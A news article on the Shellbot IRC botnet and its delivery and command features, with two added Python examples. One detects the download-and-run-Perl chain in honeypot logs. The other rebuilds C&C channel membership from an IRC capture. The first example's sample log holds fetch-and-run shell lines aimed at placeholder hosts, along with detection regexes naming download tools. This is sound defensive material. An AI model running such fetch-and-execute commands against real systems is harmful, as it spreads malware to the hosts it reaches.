Malware & Threats

Shellbot Botnet Targets Linux, Android Devices

An IRC bot written in Perl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.


Dubbed Shellbot, the malware is distributed by a threat group called Outlaw, which recently compromised FTP servers belonging to a Japanese art institution and a Bangladeshi government site. The attackers linked the compromised servers into a high-availability cluster to host an IRC bouncer and control the botnet.

Previously, the bot was distributed via an exploit for the ShellShock vulnerability, hence its name. Last month, IBM observed attacks exploiting the Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver the same bot.

The campaign Trend Micro's researchers investigated, however, used previously brute-forced or otherwise compromised hosts for distribution. The bot was observed targeting Ubuntu and Android devices.

By examining the botnet's command and control (C&C) traffic, the researchers recovered the IRC channel's details and found around 142 hosts in the channel at the time of the first infection.

To infect a host, the malware first runs a command on the target to verify that it accepts commands via the command-line interface (CLI). It then changes the working directory to /tmp, downloads the payload, and runs it with the Perl interpreter. In the final step the payload file is deleted.
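The delivery chain above (stage in a world-writable directory, fetch, run under perl, delete) is a sequence that shows up verbatim in honeypot command logs and process-execution audit trails. The following is an added example, not code from Trend Micro or from this article: a small detector that groups captured shell commands by session and reports sessions that walk through the stages in order. The exact commands Outlaw used are not given on the page, so the per-stage regexes, the tab-separated log format and the log lines themselves are assumptions constructed for the example (the IPs are from documentation ranges).

```python
import re
from collections import defaultdict

# Hypothetical honeypot/audit export: one "<session_id>\t<command line>" per
# line. Constructed for this example; the IPs are from documentation ranges.
SAMPLE_LOG = """\
s1\tuname -a
s1\tcd /tmp && wget http://203.0.113.10/bot.pl && perl bot.pl && rm -f bot.pl
s2\tcd /var/www && git pull
s2\tperl -e 'print 1'
s3\tcd /dev/shm; curl -O http://198.51.100.7/x.pl; perl x.pl
"""

# The four stages of the delivery chain described in the article. The exact
# commands used by the group are not published here, so these regexes are
# assumptions covering the common shell spellings of each step.
STAGES = (
    ("stage_dir", re.compile(r"(?:^|\s)cd\s+(?:/tmp|/var/tmp|/dev/shm)(?:/|\s|$)")),
    ("download", re.compile(r"(?:^|\s)(?:wget|curl|tftp|ftpget)\s")),
    # "perl <file>", deliberately not "perl -e ..." one-liners used by admins
    ("perl_exec", re.compile(r"(?:^|\s)perl\s+(?!-e\b)\S+")),
    ("cleanup", re.compile(r"(?:^|\s)rm\s+(?:-\w+\s+)*\S+")),
)


def split_commands(line):
    """Split a shell one-liner on ;, &&, || and | into its simple commands."""
    return [c.strip() for c in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line) if c.strip()]


def parse_log(text):
    """Group the log into session id -> list of simple commands, in order."""
    sessions = defaultdict(list)
    for raw in text.splitlines():
        if not raw.strip():
            continue
        sid, _, cmdline = raw.partition("\t")
        sessions[sid].extend(split_commands(cmdline))
    return sessions


def match_stages(commands):
    """Return the stage names hit, in chain order.

    Stages must occur in order (stage_dir, download, perl_exec, cleanup), but
    trailing stages may be absent: an operator may leave the payload on disk.
    """
    matched = []
    want = 0
    for cmd in commands:
        if want >= len(STAGES):
            break
        name, rx = STAGES[want]
        if rx.search(cmd):
            matched.append(name)
            want += 1
    return matched


def find_suspicious(text, min_stages=3):
    """Sessions whose command stream hits at least `min_stages` chain stages."""
    out = {}
    for sid, cmds in parse_log(text).items():
        hits = match_stages(cmds)
        if len(hits) >= min_stages:
            out[sid] = hits
    return out


if __name__ == "__main__":
    for sid, hits in find_suspicious(SAMPLE_LOG).items():
        print(f"{sid}: {' -> '.join(hits)}")
```

With the sample log, session s1 matches all four stages and s3 matches three (no cleanup), while s2, an administrator doing a deploy and a perl one-liner, is not reported. Requiring three ordered stages rather than any single `perl` or `wget` keeps the rule from firing on ordinary server maintenance.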

Once the Shellbot backdoor is up and running on the infected system, the IRC channel's administrator can send commands to the host to perform port scans and various forms of distributed denial of service (DDoS), download a file, gather information about other machines, or report operating system (OS) information and a list of selected running processes.
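Both the channel census mentioned earlier (about 142 hosts found by reading the C&C traffic) and the operator-issued commands described here can be reconstructed from a capture of the bot's IRC session, because IRC is plain text. The following added example (not code from Trend Micro or from this article) parses server-to-client IRC lines, rebuilds channel membership from the NAMES replies (numeric 353) and isolates messages sent by channel operators. The captured lines, nicks, channel name, hostmasks and the ".portscan" command text are invented for the example; Shellbot's real command syntax is not given on the page.

```python
# Constructed server-to-client IRC lines as a bot would see them after joining
# its C&C channel. Everything here is invented for the example.
SAMPLE_CAPTURE = [
    ":irc.example.test 001 bot-4f2a :Welcome",
    ":bot-4f2a!perl@10.0.0.5 JOIN :#ctrl",
    ":irc.example.test 353 bot-4f2a @ #ctrl :@admin bot-4f2a bot-91c0 bot-3d7e +helper",
    ":irc.example.test 353 bot-4f2a @ #ctrl :bot-aa01 bot-bb02",
    ":irc.example.test 366 bot-4f2a #ctrl :End of /NAMES list.",
    ":admin!op@203.0.113.9 PRIVMSG #ctrl :.portscan 198.51.100.20",
    ":bot-91c0!perl@10.0.0.7 PRIVMSG #ctrl :done",
    "PING :irc.example.test",
]

# Mode prefixes a server may put in front of a nick in a NAMES reply.
NICK_PREFIXES = "@+%&~"


def parse_irc(line):
    """Split one IRC line into (prefix, command, params) per RFC 1459 framing.

    A leading ":word" is the prefix (server name or nick!user@host); the text
    after the first " :" is the trailing parameter, which may contain spaces.
    """
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def summarize_channel(lines):
    """Rebuild channel name, member count and operator traffic from a capture."""
    channel = None
    members = {}  # nick -> set of mode prefixes seen in NAMES ('@' = operator)
    operator_messages = []
    for raw in lines:
        prefix, cmd, params = parse_irc(raw)
        if cmd == "353" and len(params) >= 4:
            # RPL_NAMREPLY: <client> <symbol> <channel> :<nick> <nick> ...
            channel = params[2]
            for nick in params[3].split():
                modes = set()
                while nick and nick[0] in NICK_PREFIXES:
                    modes.add(nick[0])
                    nick = nick[1:]
                members[nick] = modes
        elif cmd == "PRIVMSG" and prefix and len(params) == 2:
            sender = prefix.split("!", 1)[0]
            if "@" in members.get(sender, set()):
                operator_messages.append((sender, params[0], params[1]))
    return {
        "channel": channel,
        "hosts": len(members),
        "operators": sorted(n for n, m in members.items() if "@" in m),
        "operator_messages": operator_messages,
    }


if __name__ == "__main__":
    summary = summarize_channel(SAMPLE_CAPTURE)
    print(f"channel {summary['channel']}: {summary['hosts']} hosts, "
          f"operators {summary['operators']}")
    for sender, target, text in summary["operator_messages"]:
        print(f"  {sender} -> {target}: {text}")
```

Counting nicks across all 353 replies (a large channel is split over several) is how the host count in a capture is obtained; filtering PRIVMSG on the operator flag separates the controller's commands from the bots' replies without knowing the bot's command vocabulary in advance.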

The researchers also found that the attackers frequently modified the files hosted on the C&C server. File modifications, deletions and additions mostly occurred during daytime in Central European Time (CET), and never at night or on weekends.


The use of an IRC bot isn't a novel tactic, especially since the code used in these attacks is available online, Trend Micro notes. The operation targeted large companies, but the group has not engaged in widespread attacks, the researchers also point out.

Related: Hackers Exploit Drupalgeddon2 to Install Backdoor

Related: New Virobot Ransomware and Botnet Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
